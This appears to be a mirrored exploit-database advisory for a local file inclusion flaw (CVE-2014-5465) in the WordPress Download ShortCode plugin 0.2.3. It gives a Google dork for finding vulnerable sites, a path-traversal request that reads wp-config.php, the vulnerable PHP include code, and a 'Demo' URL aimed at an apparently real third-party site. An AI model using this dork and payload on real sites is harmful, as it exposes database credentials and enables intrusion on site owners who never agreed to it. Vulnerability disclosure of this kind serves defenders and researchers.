Skip to content
cyberexploits
webappphptext

WordPress Plugin ShortCode 0.2.3 - Local File Inclusion

WordPress Plugin ShortCode 0.2.3 - Local File Inclusion

Publié le 2014-08-28

Code source

Épinglé au commit 7eac4c3a2ce5
textplatforms/php/webapps/34436.txt7eac4c3a
raw
#################################################################################################

#

# Title                : WordPress ShortCode Plugin - Local File Inclusion Vulnerability

# Severity             : High+/Critical

# Reporter(s)          : Mehdi Karout & Christian Galeone

# Google Dork          : inurl:wp/wp-content/force-download.php

# Plugin Version       : 0.2.3

# Plugin Name          : Download ShortCode

# Plugin Download Link : http://downloads.wordpress.org/plugin/download-shortcode.1.1.zip

# Vendor Home          : http://werdswords.com/

# Date                 : 25/08/2014

# Tested in            : Win7 - Kali Linux

# CVE                  : CVE-2014-5465

#

##################################################################################################

#

# PoC :

#

#

# http://localhost:80/wordpress/wp/wp-content/force-download.php?file=[File]

#

# http://localhost:80/wordpress/wp/wp-content/force-download.php?file=../wp-config.php

#

# Exploit Code :

#

#    $file = $_GET['file'];

#  if(isset($file))

#  {

#      include("pages/$file");

#  }

#  else

#  {

#      include("index.php");

#  }

# 

# Demo :

#

# http://llyndamoreboots.com/wp/wp-content/force-download.php?file=../wp-config.php

#

##################################################################################################
Voir sur GitHub